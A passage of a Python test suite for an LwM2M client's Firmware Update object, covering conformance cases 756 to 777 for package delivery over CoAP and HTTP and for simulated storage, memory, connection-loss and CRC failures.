# performed by the Server on the Package Resource (ID:0) of the
# FW Update Object Instance
#
# A. In test step 1, the Server receives the success message "2.04"
# associated with the WRITE operation
self.test_write(ResPath.FirmwareUpdate.Package, b'\0',
format=coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 2. The Server READs (CoAP GET) the FW Object Instance to get
# the values of the State (ID:3) and Update Result (ID:5) Resources
#
# B. In test step 2, the Server receives the success message "2.05" along
# with the value of State and Update Result Resources values.
# C. In test step 2, the queried State and Update Result Resources values
# are both 0 (Idle / Initial value): FW Update Object Instance is in the
# Initial state.
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(0),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
},
ignore_extra=True))
# 3. A WRITE (CoAP PUT) operation with a valid image is
# performed by the Server on the Package Resource (ID:0) of the
# FW Update Object Instance
#
# D. In test step 3, the Server receives the success message "2.04"
# associated with the WRITE request for loading the firmware image.
self.test_write(ResPath.FirmwareUpdate.Package,
make_firmware_package(b''),
format=coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 4. The Server READs (CoAP GET) the FW Object Instance to get
# the values of the State (ID:3) and Update Result (ID:5) Resources
#
# E. In test step 4, the Server receives the success message "2.05" along
# with the State and Update Result Resources values.
# F. In test step 4, the queried value of State resource is 2 (Downloaded)
# and the value of Update Result value is still 0 (Initial Value)
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(2),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
},
ignore_extra=True))
class Test756_FirmwareUpdate_SettingTheWritableResourcePackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
super().setUp(make_firmware_package(b''))
def runTest(self):
# 1. A WRITE (CoAP PUT) operation with an empty string value is
# performed by the Server on the Package Resource (ID:0) of the FW
# Update Object Instance
#
# A. In test step 1, the Server receives the success message "2.04"
# associated with the WRITE operation
self.test_write(ResPath.FirmwareUpdate.PackageURI, b'')
# 2. The Server READs (CoAP GET) the FW Object Instance to get the
# values of the State (ID:3) and Update Result (ID:5) Resources
#
# B. In test step 2, the Server receives the success message "2.05" along
# with the value of State and Update Result Resources values.
# C. In test step 2, the queried State and Update Result Resources values
# are both 0 (Idle / Initial value): FW Update Object Instance is in the
# Initial state.
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(0),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
},
ignore_extra=True))
# 3. A WRITE (CoAP PUT) operation with a valid image is performed by
# the Server on the Package Resource (ID:0) of the FW Update Object
# Instance
#
# D. In test step 3, the Server receives the success message "2.04"
# associated with the WRITE request for the loadded image.
self.test_write(ResPath.FirmwareUpdate.PackageURI,
self.get_firmware_uri())
# give the client some time to download firmware
time.sleep(3)
# 4. The Server READs (CoAP GET) the FW Object Instance to get the
# values of the State (ID:3) and Update Result (ID:5) Resources
#
# E. In test step 4, the Server receives the success message "2.05" along
# with the State and Update Result Resources values.
# F. In test step 4, the queried value of State resource is 2 (Downloaded)
# and the value of Update Result value is still 0 (Initial Value)
self.test_read('/%d/0' % OID.FirmwareUpdate,
VV.tlv_instance(
resource_validators={
RID.FirmwareUpdate.State: VV.from_raw_int(2),
RID.FirmwareUpdate.UpdateResult: VV.from_raw_int(0),
},
ignore_extra=True))
class Test760_FirmwareUpdate_BasicObservationAndNotificationOnFirmwareUpdateObjectResources(FirmwareUpdate.Test):
def runTest(self):
# 1. The Server communicates to the Client pmin=2 and pmax=10
# periods with a WRITE-ATTRIBUTE (CoAP PUT) operation at
# the FW Update Object Instance level.
#
# A. In test step 1, the Server receives the success message "2.04" associated
# with the WRITE-ATTRIBUTE operation.
self.test_write_attributes('/%d/0' % OID.FirmwareUpdate,
pmin=2, pmax=10)
# 2. The Server Sends OBSERVE (CoAP Observe Option) message
# to activate reporting on the State Resource (/5/0/3) of the FW
# Update Object Instance.
#
# B. In test step 2, the Server receives the success message "2.05" associated
# with the OBSERVE operation, along with the value of State =Idle
req = Lwm2mObserve(ResPath.FirmwareUpdate.State)
self.serv.send(req)
res = self.serv.recv()
self.assertMsgEqual(Lwm2mContent.matching(req)(content=b'0'), res)
# 3. The Server delivers the firmware to the Client through a WRITE
# (CoAP PUT) operation on the Package Resource (/5/0/0)
#
# C. In test step 3, the Server receives the success message "2.04" associated
# with the WRITE operation delivering the firmaware image.
self.test_write(ResPath.FirmwareUpdate.Package,
make_firmware_package(b''),
format=coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 4. The Client reports requested information with a NOTIFY
# message (CoAP response)
#
# D. In test step 4, the State Resource value returned by the Client in NOTIFY
# message is set to "Downloaded"
req = Lwm2mObserve(ResPath.FirmwareUpdate.State)
self.serv.send(req)
res = self.serv.recv(timeout_s=3)
self.assertMsgEqual(Lwm2mContent.matching(req)(content=b'2'), res)
class Test770_FirmwareUpdate_SuccessfulFirmwareUpdateViaCoAP(FirmwareUpdate.Test):
def runTest(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
# 1. Step 1 โ Package Delivery
# a. The Server places the Client in the initial state of the FW Update
# process : A WRITE (CoAP PUT) operation with a NULL value
# (โ\0โ) is performed by the Server on the Package Resource
# (ID:0) of the FW Update Object Instance
#
# A. Step 1 โ Package Delivery
# a. In the test step 1.a, the Server receives the status code "2.04" for
# the WRITE success setting the Client in the FW update initial
# state.
# d. Update Result is "0" (Initial Value) during the whole step
self.test_write(ResPath.FirmwareUpdate.Package, b'\0',
coap.ContentFormat.APPLICATION_OCTET_STREAM)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 1. Step 1 โ Package Delivery
# b. The Server delivers the firmware to the Client through a WRITE
# (CoAP PUT) operation on the Package Resource (/5/0/0)
#
# A. Step 1 โ Package Delivery
# b. In the test step 1.b, The Server receives success message with
# either a "2.31" status code (Continue) or a final "2.04" status
# code.
self.test_write_block(ResPath.FirmwareUpdate.Package,
make_firmware_package(payload),
coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 1. Step 1 โ Package Delivery
# c. Polling (READ command) or Notification on Update Result
# and State Resources is performed, up to the time State Resource
# takes the โDownloadedโ value (2)
#
# A. Step 1 โ Package Delivery
# c. In the test step 1.c State Resource can take the value "1"
# (Downloading) during this sub-step and will take the value "2" at
# the end (Downloaded)
# d. Update Result is "0" (Initial Value) during the whole step
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 2. Step 2 โ Firmware Update
# a. When the download is completed (State Resource value is โ2โ
# Downloaded) , the Server initiates a firmware update by
# triggering EXECUTE command on Update Resource (CoAP
# POST /5/0/2)
#
# B. Step 2 โ Firmware Update
# a. In test step 2.a, the Server receives a success message "2.04"
# (Changed) in response to the EXECUTE command
self.test_execute(ResPath.FirmwareUpdate.Update)
# not supported: Updating state only observable via Observe
# self.assertEqual(b'3', self.test_read(ResPath.FirmwareUpdate.State))
# 2. Step 2 โ Firmware Update
# b. Polling (READ command) or Notification on Update Result and
# State Resources is performed, up to the time State Resource is
# turned back to Idle value (0) or Update Result Resource contains
# an other value than the Initial one (0)
#
# B. Step 2 โ Firmware Update
# b. In test step 2.b, the Server receives success message(s) "2.05"
# Contents along with a State Resource value of "3" (Updating)
# or "0" (Idle) and an Update Ressource value of "0" (Initial
# Value) or "1" (Firmware updated successfully)
self.serv.reset()
self.assertDemoRegisters()
# 3. Step 3 โ Process verification
# a. The Server READs Update Result ("/5/0/5") and State ("/5/0/3")
# Resources to know the result of the firmware update procedure.
#
# C. Step 3 โ Process verification
# a. In test step 3.a, the Server receives success message(s) "2.05"
# Content" along with a State Resource value of "0" (Idle) and an
# Update Ressource value of "1" (Firmware updated successfully)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'1', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 3. Step 3 โ Process verification
# b. The Server READs the Resource "Firmware Update" from the
# Object Device Instance ("/3/0/3")
#
# C. Step 3 โ Process verification
# b. In test step 3.b, the Server receives success message "2.05"
# Content" along with the expected value of the Resource
# Firmware Version from the Object Device Instance
#
# TODO: we currently update firmware with an identical executable,
# so the version does not change
self.assertEqual(prev_version, self.test_read(ResPath.Device.FirmwareVersion))
class Test771_FirmwareUpdate_SuccessfulFirmwareUpdateViaAlternateMechanism(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read())
super().setUp(pkg)
def runTest(self):
# In this test the package version stays the same after update
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
# 1. Step 1 โ Package Delivery
# a. The Server places the Client in the initial state of the FW
# Update process : A WRITE (CoAP PUT) operation with an
# empty string value is performed by the Server on the Package
# URI Resource (ID:1) of the FW Update Object Instance
#
# A. Step 1 โ Package Delivery
# a. In the test step 1.a, the Server receives the status code "2.04"
# for the WRITE success setting the Client in the FW update
# initial state.
# e. Update Result is "0" (Initial Value) during the whole test
# step 1
self.test_write(ResPath.FirmwareUpdate.PackageURI, '')
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 1. Step 1 โ Package Delivery
# b. The Server delivers the Package URI to the Client through a
# WRITE (CoAP PUT) operation on the Package URI Resource
# (/5/0/1)
#
# A. Step 1 โ Package Delivery
# b. In the test step 1.b, the Server receives the status code "2.04"
# for the WRITE success setting the Package URI Client in the
# FW update Object Instance
self.test_write(ResPath.FirmwareUpdate.PackageURI,
self.get_firmware_uri())
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 1. Step 1 โ Package Delivery
# c. The Client downloads the firmware from the provided URI via
# an alternative mechanism (not CoAP)
# d. Polling ( successive READ commands) or Notification on
# Update Result and State Resources is performed, up to the time
# State Resource takes the โDownloadedโ value (2)
#
# A. Step 1 โ Package Delivery
# c. In the test step 1.c, The Server receives success message
# with either a "2.31" status code (Continue) or a final "2.04"
# status code.
# d. In the test step 1.d State Resource can take the value "1"
# (Downloading) during this sub-step and will take the value
# "2" at the end (Downloaded)
# e. Update Result is "0" (Initial Value) during the whole test
# step 1
observed_states = self.collect_values(ResPath.FirmwareUpdate.State, b'2')
self.assertEqual(b'2', observed_states[-1])
self.assertIn(set(observed_states), [{b'0', b'1', b'2'}, {b'1', b'2'}])
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 2. Step 2 โ Firmware Update
# a. When the download is completed (State Resource value is โ2โ
# Downloaded) , the Server initiates a firmware update by
# triggering EXECUTE command on Update Resource (CoAP
# POST /5/0/2 )
#
# B. Step 2 โ Firmware Update
# a. In test step 2.a, the Server receives a success message "2.04"
# (Changed) in response to the EXECUTE command
self.test_execute(ResPath.FirmwareUpdate.Update)
# not supported: Updating state only observable via Observe
# self.assertEqual(b'3', self.test_read(ResPath.FirmwareUpdate.State))
# 2. Step 2 โ Firmware Update
# b. Polling (READ command) or Notification on Update Result and
# State Resources is performed, up to the time State Resource is
# turned back to Idle value (0) or Update Result Resource contains
# an other value than the Initial one (0)
#
# B. Step 2 โ Firmware Update
# b. In test step 2.b, the Server receives success message(s) "2.05"
# Contents along with a State Resource value of "3" (Updating)
# or "0" (Idle) and an Update Ressource value of "0" (Initial
# Value) or "1" (Firmware updated successfully)
self.serv.reset()
self.assertDemoRegisters()
# 3. Step 3 โ Process verification
# a. The Server READs Update Result ("/5/0/5") and State ("/5/0/3")
# Resources to know the result of the firmware update procedure.
#
# C. Step 3 โ Process verification
# a. In test step 3.a, the Server receives success message(s) "2.05"
# Content" along with a State Resource value of "0" (Idle) and an
# Update Ressource value of "1" (Firmware updated successfully)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'1', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 3. Step 3 โ Process verification
# b. The Server READs the Resource "Firmware Update" from the
# Object Device Instance ("/3/0/3")
#
# C. Step 3 โ Process verification
# b. In test step 3.b, the Server receives success message "2.05"
# Content" along with the expected value of the Resource
# Firmware Version from the Object Device Instance
#
# TODO: we currently update firmware with an identical executable,
# so the version does not change
self.assertEqual(prev_version, self.test_read(ResPath.Device.FirmwareVersion))
class Test772_FirmwareUpdate_ErrorCase_FirmwarePackageNotDownloaded(FirmwareUpdate.Test):
def runTest(self):
# 1. The Server send a READ operation (CoAP GET /5/0) to the Client on the
# FW Update Object Instance to obtain the values of the State and Update
# Resources.
#
# A. In test step 1, the Server receives a success message ("2.05" Content)
# associated to its READ command along with a State Resource value
# which is not "2" (Downloaded) and a valid (0..9) Update Resource
# value
state = self.test_read(ResPath.FirmwareUpdate.State)
self.assertNotEqual(b'2', state)
update_result = self.test_read(ResPath.FirmwareUpdate.UpdateResult)
self.assertIn(int(update_result.decode('ascii')), range(10))
# 2. the Client receives an EXECUTE operation on the Update Resource
# (CoAP POST /5/0/2 ) of the FW Update Object Instance
#
# B. In test step 2, the Server receives the status code "4.05" for method
# not allowed associated to its EXECUTE command
req = Lwm2mExecute(ResPath.FirmwareUpdate.Update)
self.serv.send(req)
res = self.serv.recv()
self.assertMsgEqual(Lwm2mErrorResponse.matching(req)(coap.Code.RES_METHOD_NOT_ALLOWED),
res)
# 3. The Server send a READ operation again (CoAP GET /5/0/3) to the Client
# on the FW Update Object Instance to obtain the State and the Update
# Resource values
#
# C. In test step 3, the Server receives a success message ("2.05" Content)
# associated to its READ command along with a State Resource value
# and an Update Result Resource value, identical to the ones retrieved
# in Pass-Criteria A. The firmware has not bee installed.
self.assertEqual(state, self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(update_result, self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test773_FirmwareUpdate_ErrorCase_NotEnoughStorage_FirmwareURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
@contextlib.contextmanager
def temporary_soft_fsize_limit(limit_bytes):
prev_limit = resource.getrlimit(resource.RLIMIT_FSIZE)
try:
resource.setrlimit(resource.RLIMIT_FSIZE, (limit_bytes, prev_limit[1]))
yield
finally:
resource.setrlimit(resource.RLIMIT_FSIZE, prev_limit)
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
# Limit file size for demo so that full firmware is too much.
# After demo starts, we can safely restore original limit, as
# the client already inherited smaller one.
with temporary_soft_fsize_limit(len(payload) // 2):
super().setUp(payload)
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in
# Idle State
#
# A. In test step 1, the Server receives the status code "2.05 " (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either
# through a WRITE (CoAP PUT) operation in the Package
# Resource (/5/0/0) or through a WRITE operation of an URI in the
# Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write(ResPath.FirmwareUpdate.PackageURI,
self.get_firmware_uri())
# 3. The firmware downloading process is runing The Server sends
# repeated READs or OBSERVE on State and Update Result
# Resources (CoAP GET /5/0) of the FW Update Object Instance
# to determine when the download is completed or if an error
# occured.Before the end of download, the device runs out of
# storage and cannot finish the download
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource retrieved with a value of "1" from
# successive Server READs or Client NOTIFY messages, indicates the
# download stage of the Package Delivery is engaged
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "2" indicating an error occurred during the downloading
# process related to shortage of storage memory The State Resource
# value never reaches the Downloaded value ("2")
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "2" indicates the firmware Package Delivery
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test773_FirmwareUpdate_ErrorCase_NotEnoughStorage_FirmwareURI_CoAP(FirmwareUpdate.TestWithCoapServer):
def setUp(self):
# limit file size to 100K; enough for persistence file, not
# enough for firmware
import resource
self.prev_limit = resource.getrlimit(resource.RLIMIT_FSIZE)
new_limit_b = 100 * 1024
resource.setrlimit(resource.RLIMIT_FSIZE, (new_limit_b, self.prev_limit[1]))
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
self._payload = f.read()
super().setUp()
def tearDown(self):
import resource
resource.setrlimit(resource.RLIMIT_FSIZE, self.prev_limit)
super().tearDown()
def runTest(self):
with self.file_server as file_server:
file_server.set_resource('/firmware', self._payload)
uri = file_server.get_resource_uri('/firmware')
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in
# Idle State
#
# A. In test step 1, the Server receives the status code "2.05 " (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either
# through a WRITE (CoAP PUT) operation in the Package
# Resource (/5/0/0) or through a WRITE operation of an URI in the
# Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write(ResPath.FirmwareUpdate.PackageURI, uri)
# 3. The firmware downloading process is runing The Server sends
# repeated READs or OBSERVE on State and Update Result
# Resources (CoAP GET /5/0) of the FW Update Object Instance
# to determine when the download is completed or if an error
# occured.Before the end of download, the device runs out of
# storage and cannot finish the download
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource retrieved with a value of "1" from
# successive Server READs or Client NOTIFY messages, indicates the
# download stage of the Package Delivery is engaged
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "2" indicating an error occurred during the downloading
# process related to shortage of storage memory The State Resource
# value never reaches the Downloaded value ("2")
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "2" indicates the firmware Package Delivery
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test774_FirmwareUpdate_ErrorCase_OutOfMemory(FirmwareUpdate.Test):
def runTest(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1, the Server receives the status code "2.05" (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either through
# a WRITE (CoAP PUT) operation in the Package Resource (/5/0/0) or
# through a WRITE operation of an URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write_block(ResPath.FirmwareUpdate.Package,
make_firmware_package(payload, force_error=FirmwareUpdateForcedError.OutOfMemory),
coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 3. The firmware download process is runing The Server sends repeated
# READs or OBSERVE on State and Update Result Resources (CoAP
# GET /5/0) of the FW Update Object Instance to determine when the
# download is completed or if an error occured.Before the end of
# download, the Client runs out of RAM and cannot finish the
# download
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource retrieved with a value of "1" from
# successive Server READs or Client NOTIFY messages, indicates the
# download stage of the Package Delivery is engaged
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "2" indicating an error occurred during the download process
# related to shortage of RAM The State Resource value never reaches
# the Downloaded value ("3")
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "3" indicates the firmware Package Delivery
# aborted due to shortage of RAM.
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'3', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class FirmwareUpdate_ErrorCase_OutOfMemory_PackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), force_error=FirmwareUpdateForcedError.OutOfMemory)
super().setUp(pkg)
def runTest(self):
# Test 774, but with Package URI
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'3', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test775_FirmwareUpdate_ErrorCase_ConnectionLostDuringDownloadPackageURI(FirmwareUpdateWithHttpServer.Test):
class NoShutdownHttpServer(http.server.HTTPServer):
def shutdown_request(self, request):
pass
def close_request(self, request):
pass
HTTP_SERVER_CLASS = NoShutdownHttpServer
def during_download(self, req_handler):
self._dangling_http_socket = req_handler.request
# HACK to ignore any calls on .wfile afterwards
req_handler.wfile = ANY
def setUp(self):
self._dangling_http_socket = None
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), force_error=FirmwareUpdateForcedError.OutOfMemory)
super().setUp(pkg)
def tearDown(self):
try:
if self._dangling_http_socket is not None:
self._dangling_http_socket.close()
finally:
super().tearDown()
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1., the Server receives the status code "2.05 " (Content)
# for the READ success command, along with the State Resource value
# of "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client through a
# WRITE operation of an URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting the Package URI Resource
# according to the PULL firmware delivery method.
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occured.Before the end of download, the connection is intentionnaly
# lost and the download cannot be finished.
# 4. When the Package delivery is stopped the Server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is engaged in a Download stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "4" indicating an error occurred during the downloading
# process related to connection lost
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "4" indicates the firmware Package Delivery
# aborted due to connection lost dur the Package delivery.
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0',
max_iterations=600) # wait up to 60 seconds
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'4', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test775_FirmwareUpdate_ErrorCase_ConnectionLostDuringDownloadPackageURI_CoAP(FirmwareUpdate.TestWithCoapServer):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), force_error=FirmwareUpdateForcedError.OutOfMemory)
class MuteServer(coap.Server):
def send(self, *args, **kwargs):
pass
super().setUp(coap_server=MuteServer(), extra_cmdline_args=['--fwu-ack-timeout', '1'])
with self.file_server as file_server:
file_server.set_resource('/firmware', pkg)
self._uri = file_server.get_resource_uri('/firmware')
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1., the Server receives the status code "2.05 " (Content)
# for the READ success command, along with the State Resource value
# of "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client through a
# WRITE operation of an URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting the Package URI Resource
# according to the PULL firmware delivery method.
self.test_write(ResPath.FirmwareUpdate.PackageURI, self._uri)
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occured.Before the end of download, the connection is intentionnaly
# lost and the download cannot be finished.
# 4. When the Package delivery is stopped the Server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is engaged in a Download stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "4" indicating an error occurred during the downloading
# process related to connection lost
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "4" indicates the firmware Package Delivery
# aborted due to connection lost dur the Package delivery.
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0',
max_iterations=50, step_time=1)
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'4', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test776_FirmwareUpdate_ErrorCase_CRCCheckFail(FirmwareUpdate.Test):
def runTest(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1, the Server receives the status code "2.05 " (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either through
# a WRITE (CoAP PUT) operation in the Package Resource (/5/0/0) or
# through a WRITE operation of an URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write_block(ResPath.FirmwareUpdate.Package,
make_firmware_package(payload, crc=0),
coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occured. The firmware package Integry Check failure stopped the
# download process.
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is maintained in Downloading stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "5" indicating an error occurred during the downloading
# process related to the failure of the firmware package integrity check
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "5" indicates the firmware Package Delivery
# aborted due to a Firmware Package Integrity failure.
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'5', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class FirmwareUpdate_ErrorCase_CRCCheckFail_PackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), crc=0)
super().setUp(pkg)
def runTest(self):
# Test 776, but with Package URI
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'5', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test777_FirmwareUpdate_ErrorCase_UnsupportedPackageType(FirmwareUpdate.Test):
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1, the Server receives the status code "2.05 " (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server delivers the firmware package to the Client either through
# a WRITE (CoAP PUT) operation in the Package Resource (/5/0/0 ) or
